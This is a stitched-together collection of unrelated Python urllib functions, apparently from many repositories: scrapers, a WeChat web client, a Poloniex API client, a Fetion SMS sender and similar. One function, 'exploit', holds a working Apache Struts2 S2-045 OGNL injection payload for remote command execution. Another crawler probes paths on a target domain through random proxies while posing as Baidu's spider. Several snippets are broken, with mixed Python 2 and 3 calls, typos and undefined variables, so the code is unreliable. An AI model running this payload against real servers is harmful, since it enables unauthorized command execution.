def download(book): """ Download a book from libgen.in to the current directory. :param book: md5 hash of a book """ blocksize = 1024 # in bytes filename = book['title'] + '.' + book['extension'] bookurl = downloadurl + book['hash'] filesize = int( urllib.urlopen(bookurl).info().getheaders("Content-Length") [0]) # in bytes req = urllib.Request(bookurl) parts = _range(0, filesize, blocksize) req = urllib.Request(downloadurl + book['hash']) requests = list(itertools.repeat( req, len(parts))) # make len(parts) request copies reqs = [] for r, rng in itertools.izip(requests, parts): reqs.append( r.add_header('Range', 'bytes={0}-{1}'.format(rng[0], rng[1]))) for r in reqs: print(r.headers) return #requests = [r.add_header('Range', 'bytes={0}-{1}'.format(rng[0], rng[1])) for r, rng in itertools.izip(requests, parts)] # change headers def _download_and_save(req): with open(filename, 'wb') as f: f.seek(byte) f.write(req.get_data()) p = multiprocessing.Pool(processes=3) parts = p.map(_download_and_save, requests)
def fetion(msg): cj = cookielib.LWPCookieJar() opener = urllib.build_opener(urllib.HTTPCookieProcessor(cj)) urllib.install_opener(opener) args = {'pass': password, 'm': user, 'loginstatus': loginstatus} print('Logining...') req = urllib.Request(url_login, urllib.urlencode(args)) jump = opener.open(req) page = jump.read() url = re.compile(r'<card id="start".*?ontimer="(.*?);').findall(page)[ 0] #��ȡ��ת���� arg_t = re.compile(r't=(\d*)').findall(page)[0] if url == '/im/login/login.action': #��¼ʧ�� print('Login Failed!') input('Press any key to exit.') return else: print('Login Successfully!') sendmsg = urllib.Request( url_msg, urllib.urlencode({'msg': msg.decode('gbk').encode('utf-8')})) finish = urllib.urlopen(sendmsg) if finish.geturl == 'http://f.10086.cn/im/user/sendMsgToMyself.action': print('Send Failed!') else: print('Send Successfully') logout = urllib.Request(url_logout + arg_t) response = urllib.urlopen(logout) #ע�� print('Logout Successfully!')
def api_query(self, command, req={}): if (command == "returnTicker" or command == "return24Volume"): ret = urllib.request('https://poloniex.com/public?command=' + command) return json.loads(ret.read()) elif (command == "returnOrderBook"): ret = urllib.request.urlopen( urllib.Request('https://poloniex.com/public?command=' + command + '¤cyPair=' + str(req['currencyPair']))) return json.loads(ret.read()) elif (command == "returnMarketTradeHistory"): ret = urllib.request.urlopen( urllib.Request('https://poloniex.com/public?command=' + "returnTradeHistory" + '¤cyPair=' + str(req['currencyPair']))) return json.loads(ret.read()) else: req['command'] = command req['nonce'] = int(time.time() * 1000) post_data = urllib.urlencode(req) sign = hmac.new(self.Secret, post_data, hashlib.sha512).hexdigest() headers = {'Sign': sign, 'Key': self.APIKey} ret = uurllib.request.urlopen( urllib.Request('https://poloniex.com/tradingApi', post_data, headers)) jsonRet = json.loads(ret.read()) return self.post_process(jsonRet)
def getHtmlText(self, is_cookie=False): if self.post_data == None and self.header == {}: request = urllib.Request(self.url_path) elif self.post_data == None: request = urllib.Request(self.url_path, headers=self.header) request = urllib.request.urlopen(self.url_path) else: request = urllib.Request(self.url_path, urllib.urlencode(self.post_data), self.header) result = urllib.urlopen(request) if is_cookie: self.operate = self.opener.open(request) resText = result.read() return resText
def GetDownload(self, url1, imgurl): """ 从百度中将图片下载下来并保存在c盘的a.jpg Author linsw 参数:目标路径、保存路径 Example: | *Keywords* | | get down load | http://www.baidu.com | c:\\a.jpg | """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36' } #request = urllib2.Request(url1,headers=headers) request = urllib.Request(url1, headers=headers) #repronse = urllib2.urlopen(request) repronse = urllib.urlopen(request) type = sys.getfilesystemencoding() with open(imgurl, "wb") as f: f.write(repronse.read())
def process_item(self, item, spider): print('test2') file_name = os.path.join(u'', os.getcwd(), 'cbrc', settings.BaseDir, str(item['level']), item['urltitle'].strip() + '.html') htmltext = "" print(file_name) if not self.checkfileExists(file_name): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0' } req = urllib.Request(url=item['url'], headers=headers) res = urllib.request.urlopen(req) htmltext = res.read() htmltext = htmltext.replace('charset=gb2312', 'charset=utf-8') with open(file_name, 'wb') as fp: fp.write(htmltext) print(u"保存文件:" + file_name) else: f = open(file_name, 'r') htmltext = f.read() pass #query = self.dbpool.runInteraction(self.__insertdata, item,htmltext,file_name) #query.addErrback(self.handle_error) return item
def get_device_type(self, device_name): """ 根据设备名称,返回设备的类型,主要有三种类型HPCC, FC ,unknown :param device_name: 设备的名称 :return: 设备的类型,HPCC 或 FC 或 unknown """ try: dd = self.collection["device_app"].find_one({"name": device_name}) return dd["type"] except Exception: logger.error(e) # get_url = RCMS_API.format(device_name) # got_list = eval(urllib.urlopen(get_url, timeout=100).read()) # try: # device_type = [dic['appName'] for dic in got_list if dic['appName'] in ['FC', 'HPCC']][0] # except Exception, ex: # logger.error(traceback.format_exc()) # device_type = 'unknown' if not device_name or device_name == 'null': return 'unknown' get_url = RCMS_API.format(device_name) # add header req = urllib.Request(get_url, headers=send_headers) got_list = eval(urllib.request.urlopen(req, timeout=100).read()) try: got_list = got_list.get('data') device_type = [ dic['appName'] for dic in got_list if dic['appName'] in ['FC', 'HPCC'] ][0] except Exception: logger.error(traceback.format_exc()) device_type = 'unknown' return device_type
def parse(diff): # common # http://stackoverflow.com/questions/17509607/submitting-to-a-web-form-using-python formdata = { 'env': 'a230', 'submit': '%E8%A1%A8%E7%A4%BA',#u'表示', 'cat': 0, 'mode': 'p1', 'offi': diff, } formdata_raw = urllib.urlencode(formdata) req = urllib.Request("http://zasa.sakura.ne.jp/dp/rank.php", formdata_raw) data = urllib.request.urlopen(req).read() soup = BeautifulSoup(data, "lxml") # depress warning - parser 'lxml' res = [] # [(group, [song name, ..]), ..] table = soup.find('table', class_="rank_p1") trs = table.find_all('tr') group_title = '' for tr in trs[1:-1]: # first col: diff group group_title = tr.find_all('td')[0].get_text() spns = tr.find_all('span') for sp in spns: sp_text = sp.get_text() title = sp_text[:-4] diff = "DP" + sp['class'][0].upper() if (diff == "DPL"): diff = "DPA" title += " (L)" group = getGroup(res, group_title) group[1].append( (title, diff) ) return res
def main(): userAgent = 'SubDB1.0 (seema1711/0.1; https://github.com/seema1711/subtitle-downloader)' moviePath = sys.argv[1] movieName = os.path.join(os.getcwd(), moviePath) language = 'en' action = 'download' baseURL = 'http://api.thesubdb.com/?' hashed = get_hash(movieName) content = { 'action': action, 'hash': hashed, 'language': language, } url = baseURL + urllib.urlencode(content) request = urllib.Request(url) request.add_header('User-Agent', userAgent) response = urllib.urlopen(request) subtitles = response.read() index = movieName.rfind('.') fileName = movieName[0:index] + '.srt' with open(fileName,'w') as f: f.write(subtitles) print("Subtitle Downloaded!!")
def crawler(): while not q.empty(): # 循环 path = q.get() #将line从队列 q 中取出来 url = "%s%s" % (domain_name, path) # 组合url地址,用于下一步提交 random_proxy = random.choice(proxy_list) # 随机使用一个代理服务器 proxy_support = urllib.ProxyHandler(random_proxy) opener = urllib.build_opener(proxy_support) urllib.install_opener(opener) headers = {} headers['User-Agent'] = Baidu_spider # 蜘蛛的头部信息 # 玩蛇网 www.iplaypython.com request = urllib.Request(url, headers=headers) try: response = urllib.urlopen(request) content = response.read() if len(content): # 内容不为空的情况下返回状态码、路径 print("Status [%s] - path: %s" % (response.code, path)) response.close() time.sleep(1) # 休息一会儿,防止速度过快连接数过大被封掉IP except urllib.HTTPError as e: # print e.code, path pass # 异常处理,先暂时pass掉
def trigger_url(url): data = '{ "value1" : "' + time.strftime("%Y-%m-%d") + '", "value2" : "' + time.strftime("%H:%M") + '" }' req = urllib.Request(url, data, {'Content-Type': 'application/json'}) f = urllib.urlopen(req) response = f.read() f.close() return response
def download_page(url): version = (3, 0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib.request #urllib library for Extracting web pages try: headers = {} headers[ 'User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib.request.Request(url, headers=headers) resp = urllib.request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib try: headers = {} headers[ 'User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib.Request(url, headers=headers) response = urllib.urlopen(req) page = response.read() return page except: return "Page Not found"
def GetCoverPage(self, url, title): Log("Getting cover page") Log(title) Log(url) page = 1 while True: try: accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36' headers = {'Accept': accept} if 'http' in url: u = url + "/" + str(page) Log(u) req = urllib.Request(url + "/" + str(page)) req.add_header('Accept', accept) resp = urllib.urlopen(req) ele = HTML.ElementFromString(resp.read()) test = ele.xpath('//h2') if len(test) == 0: scenes = ele.xpath( '//div[contains(@class,"cover-wrap")]//img') for s in scenes: alt = s.get('alt').lower() if alt != '': Log("alt = " + alt) if (alt in title) or (title in alt): return s.get('src') else: break page = page + 1 except: Log("Got to page: " + str(page)) break
def get_content(self): """ 从糗事百科中获取故事 :return: 故事列表 """ stories = [] content_pattern = re.compile('<div class="content">([\w\W]*?)</div>([\w\W]*?)class="stats"') # 匹配故事内容(第一空)和是否含有图片(第二空)的模板 pattern = re.compile('<.*?>') # 匹配包括括号及括号内无关内容的模板 url = job_redis.spop('urls') while url: # 当数据库还存在网页url,取出一个并爬取 try: request = urllib.Request(url, headers=headers) response = urllib.urlopen(request) text = response.read() except urllib.URLError as e: # 若出现网页读取错误捕获并输出 if hasattr(e, "reason"): print(e.reason) content = re.findall(content_pattern, text) # 获取含模板内容的列表 for x in content: if "img" not in x[1]: # 过滤含图片的故事 x = re.sub(pattern, '', x[0]) x = re.sub('\n', '', x) stories.append(x) url = job_redis.spop('urls') time.sleep(3) return stories
def rpc(method, params): data = { "jsonrpc": "1.0", "id": "curltest", "method": method, "params": params } data_json = dumps(data) username = argv[1] password = argv[2] port = 28280 if len(argv) > 3: port = argv[3] url = "http://127.0.0.1:{}/".format(port) req = urllib.Request(url, data_json, {'content-type': 'application/json'}) base64string = base64.encodestring('%s:%s' % (username, password)).replace( '\n', '') req.add_header("Authorization", "Basic %s" % base64string) response_stream = urllib.urlopen(req) json_response = response_stream.read() return loads(json_response)
def showQRImage(): global tip url = 'https://login.weixin.qq.com/qrcode/' + uuid params = { 't': 'webwx', '_': int(time.time()), } request = urllib.Request(url=url, data=urllib.urlencode(params)) response = urllib.urlopen(request) tip = 1 f = open(QRImagePath, 'wb') f.write(response.read()) f.close() if sys.platform.find('darwin') >= 0: os.system('open %s' % QRImagePath) elif sys.platform.find('linux') >= 0: os.system('xdg-open %s' % QRImagePath) else: os.system('call %s' % QRImagePath) print('请使用微信扫描二维码以登录')
def waitForLogin(): global tip, base_uri, redirect_uri url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % ( tip, uuid, int(time.time())) request = urllib.Request(url=url) response = urllib.urlopen(request) data = response.read() # print data # window.code=500; regx = r'window.code=(\d+);' pm = re.search(regx, data) code = pm.group(1) if code == '201': #已扫描 print('成功扫描,请在手机上点击确认以登录') tip = 0 elif code == '200': #已登录 print('正在登录...') regx = r'window.redirect_uri="(\S+?)";' pm = re.search(regx, data) redirect_uri = pm.group(1) + '&fun=new' base_uri = redirect_uri[:redirect_uri.rfind('/')] elif code == '408': #超时 pass # elif code == '400' or code == '500': return code
def get_page(url, pn, keyword): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)' 'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3', 'Host': 'www.lagou.com', 'Connection': 'keep-alive', 'Origin': 'http://www.lagou.com' } if pn == 1: boo = 'true' else: boo = 'false' page_data = urllib.request.urlopen()([('url', url), ('pn', pn), ('kd', keyword)]) req = urllib.Request(url, headers=headers) page = urllib.request.urlopen(req, data=page_data.encode('utf-8')).read() page = page.decode('utf-8') return page
def submit(fmserver, infotype, trackartist, tracktitle, sessionkey): if infotype == 'loved': libremethod = 'track.love' elif infotype == 'unloved': libremethod = 'track.unlove' elif infotype == 'banned': libremethod = 'track.ban' elif infotype == 'unbanned': libremethod = 'track.unban' else: sys.exit('invalid method') postdata = dict(method=libremethod, artist=trackartist, track=tracktitle, sk=sessionkey, format='json') req = urllib.Request(fmserver + '/2.0/', urllib.parse.urlencode(postdata)) response = urllib.urlopen(req) try: jsonresponse = json.load(response) status = jsonresponse['lfm']['status'] if status == "ok": return True except: return False
def exploit(self, url, cmd): ''' 对存在Struct2 45漏洞的主机实现任意命令执行 :param url: 目标URL :param cmd: 需要执行的指令 :return: 执行后的返回页面内容 ''' payload = "%{(#_='multipart/form-data')." payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % cmd payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" try: headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} request = urllib.Request(url, headers=headers) page = urllib.urlopen(request).read() except http.client.IncompleteRead as e: page = e.partial print(page) return page
def get_devices_type(self, devices): """ 根据设备名称列表,返回所有设备的信息列表,设备和设备类型的对应列表,如{设备1:HPCC, 设备2:FC} ,暂时没有使用此方法 :param devices: :return: """ devices_type = {} for dev in devices: try: dd = self.collection["device_app"].find_one({"name": dev}) devices_type[dev] = dd["type"] except Exception: print(e) logger.error(e) get_url = RCMS_API.format(dev) # add header req = urllib.Request(get_url, headers=send_headers) got_list = eval( urllib.request.urlopen(req, timeout=100).read()) try: got_list = got_list.get('data') devices_type[dev] = [ dic['appName'] for dic in got_list if dic['appName'] in ['FC', 'HPCC'] ][0] except Exception: logger.error(traceback.format_exc()) devices_type[dev] = 'unknown' return devices_type
def webwxinit(): url = base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % ( pass_ticket, skey, int(time.time())) params = {'BaseRequest': BaseRequest} request = urllib.Request(url=url, data=json.dumps(params)) request.add_header('ContentType', 'application/json; charset=UTF-8') response = urllib.urlopen(request) data = response.read() if DEBUG == True: f = open(os.getcwd() + '/webwxinit.json', 'wb') f.write(data) f.close() # print data global ContactList, My dic = json.loads(data) ContactList = dic['ContactList'] My = dic['User'] ErrMsg = dic['BaseResponse']['ErrMsg'] if len(ErrMsg) > 0: print(ErrMsg) Ret = dic['BaseResponse']['Ret'] if Ret != 0: return False return True
def write_devices_failed_top(data): """ 写入设备失败前10的设备 :param data: :return: """ theader = '<th>NO.</th><th>hostname</th><th>ISP</th><th>type</th><th>firstLayer</th><th>500</th><th>501</th><th>502</th><th>503</th><th>FAIL</th><th>mrtg</th>' trs = [] mrtg = "" for i, device in enumerate(list(data['data'].values())[:10]): try: dev = conn.device_app.find_one({"name": device['hostname']}) url = HOPE_MRTG.format(dev["devCode"]) logger.debug("write_devices_failed_top url: %s" % (url, )) # add header req = urllib.Request(url, headers=send_headers) mrtg_info = eval(urllib.request.urlopen(req, timeout=100).read()) mrtg = ','.join(mrtg_info['data']['mrtgs']) # mrtg = mrtg.decode("utf-8") except Exception: logger.error(traceback.format_exc()) tr = [ str(i + 1), device['hostname'], device['ISP'], device['type'], str(device['firstLayer']), str(device.get('500', 0)), str(device.get('501', 0)), str(device.get('502', 0)), str(device.get('503', 0)), str(device.get('failed_total', 0)), mrtg ] # unicode.encode(mrtg,"utf-8") trs.append('<td>{0}</td>'.format('</td><td>'.join(tr))) table = '<table border="1">\n<thead><tr>{0}</tr></thead>\n<tbody>\n<tr>{1}</tr></tbody></table>'.format( theader, '</tr>\n<tr>'.join(trs)) return table
def createChatroom(UserNames): MemberList = [] for UserName in UserNames: MemberList.append({'UserName': UserName}) url = base_uri + '/webwxcreatechatroom?pass_ticket=%s&r=%s' % ( pass_ticket, int(time.time())) params = { 'BaseRequest': BaseRequest, 'MemberCount': len(MemberList), 'MemberList': MemberList, 'Topic': '', } request = urllib.Request(url=url, data=json.dumps(params)) request.add_header('ContentType', 'application/json; charset=UTF-8') response = urllib.urlopen(request) data = response.read() # print data dic = json.loads(data) ChatRoomName = dic['ChatRoomName'] MemberList = dic['MemberList'] DeletedList = [] for Member in MemberList: if Member['MemberStatus'] == 4: #被对方删除了 DeletedList.append(Member['UserName']) ErrMsg = dic['BaseResponse']['ErrMsg'] if len(ErrMsg) > 0: print(ErrMsg) return (ChatRoomName, DeletedList)
def auth_as_app(self) -> str: logger.info("Getting access token for app") self.request_time = datetime.datetime.now() data = {'grant_type': 'client_credentials'} pw_manager = urllib.HTTPPasswordMgrWithDefaultRealm() pw_manager.add_password(None, constants.OAUTH_URL, self.app_id, self.app_secret) urllib.install_opener( urllib.build_opener(urllib.HTTPBasicAuthHandler(pw_manager))) request = urllib.Request(constants.OAUTH_URL, data=data, headers=constants.OAUTH_REQUEST_HEADERS) try: with urllib.request.urlopen(request) as response: self.full_response = json.loads(response.read()) self.jwt = self.full_response["access_token"] self.expires_in_secs = datetime.timedelta( seconds=self.full_response["expires_in"]) self.expiry_time = self.request_time + self.expires_in_secs - constants.JWT_TOKEN_REFRESH_BUFFER logger.log( 5, "refreshed auth token at %s - token will expire in %s, with a buffer next refresh will be at %s", self.request_time, self.expires_in_secs, self.expiry_time) return self.full_response except urllib.error.HTTPError as err: logger.critical( "Tried to authenticate an app, got error code %s with reason %s", err.code, err.reason) raise UnauthorizedRequestError()
def deleteMember(ChatRoomName, UserNames): url = base_uri + '/webwxupdatechatroom?fun=delmember&pass_ticket=%s' % ( pass_ticket) params = { 'BaseRequest': BaseRequest, 'ChatRoomName': ChatRoomName, 'DelMemberList': ','.join(UserNames), } request = urllib.Request(url=url, data=json.dumps(params)) request.add_header('ContentType', 'application/json; charset=UTF-8') response = urllib.urlopen(request) data = response.read() # print data dic = json.loads(data) ErrMsg = dic['BaseResponse']['ErrMsg'] if len(ErrMsg) > 0: print(ErrMsg) Ret = dic['BaseResponse']['Ret'] if Ret != 0: return False return True
def addMember(ChatRoomName, UserNames): url = base_uri + '/webwxupdatechatroom?fun=addmember&pass_ticket=%s' % ( pass_ticket) params = { 'BaseRequest': BaseRequest, 'ChatRoomName': ChatRoomName, 'AddMemberList': ','.join(UserNames), } request = urllib.Request(url=url, data=json.dumps(params)) request.add_header('ContentType', 'application/json; charset=UTF-8') response = urllib.urlopen(request) data = response.read() # print data dic = json.loads(data) MemberList = dic['MemberList'] DeletedList = [] for Member in MemberList: if Member['MemberStatus'] == 4: #被对方删除了 DeletedList.append(Member['UserName']) ErrMsg = dic['BaseResponse']['ErrMsg'] if len(ErrMsg) > 0: print(ErrMsg) return DeletedList
def getUUID(): global uuid url = 'https://login.weixin.qq.com/jslogin' params = { 'appid': 'wx782c26e4c19acffb', 'fun': 'new', 'lang': 'zh_CN', '_': int(time.time()), } request = urllib.Request(url=url, data=urllib.urlencode(params)) response = urllib.urlopen(request) data = response.read() # print data # window.QRLogin.code = 200; window.QRLogin.uuid = "oZwt_bFfRg=="; regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"' pm = re.search(regx, data) code = pm.group(1) uuid = pm.group(2) if code == '200': return True return False
def LoadPageContent(self, page): # 记录开始时间 begin_time = datetime.datetime.now() url = "https://mm.taobao.com/json/request_top_list.htm?page=" + str( page) self.page += 1 USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36' headers = {'User-Agent': USER_AGENT} request = urllib.Request(url, headers=headers) response = urllib.urlopen(request) # 正则获取 pattern_link = re.compile( r'<div.*?class="pic-word">.*?<img src="(.*?)".*?' r'<a.*?class="lady-name".*?href="(.*?)".*?>(.*?)</a>.*?' r'<em>.*?<strong>(.*?)</strong>.*?' r'<span>(.*?)</span>', re.S) items = re.findall(pattern_link, response.read().decode('gbk')) for item in items: # 头像,个人详情,名字,年龄,地区 print u'发现一位MM 名字叫%s 年龄%s 坐标%s' % (item[2], item[3], item[4]) print u'%s的个人主页是 %s' % (item[2], item[1]) print u'继续获取详情页面数据...' # 详情页面 detailPage = item[1] name = item[2] self.getDetailPage(detailPage, name, begin_time)
def getImage(url): # 用urllib2库链接网络图像 response = ulb.Request(url) # 随机选择一个Header伪装成浏览器 response.add_header('User-Agent', random.choice(my_headers)) # 打开网络图像文件句柄 fp = ulb.urlopen(response) # 定义图像IO p = ImageFile.Parser() # 开始图像读取 while 1: s = fp.read(1024) if not s: break p.feed(s) # 得到图像 im = p.close() # 将图像转换成numpy矩阵 arr = np.array(im) # 将图像RGB通道变成BGR通道,用于OpenCV显示 pic = np.zeros(arr.shape, np.uint8) pic[:, :, 0] = arr[:, :, 2] pic[:, :, 1] = arr[:, :, 1] pic[:, :, 2] = arr[:, :, 0] return pic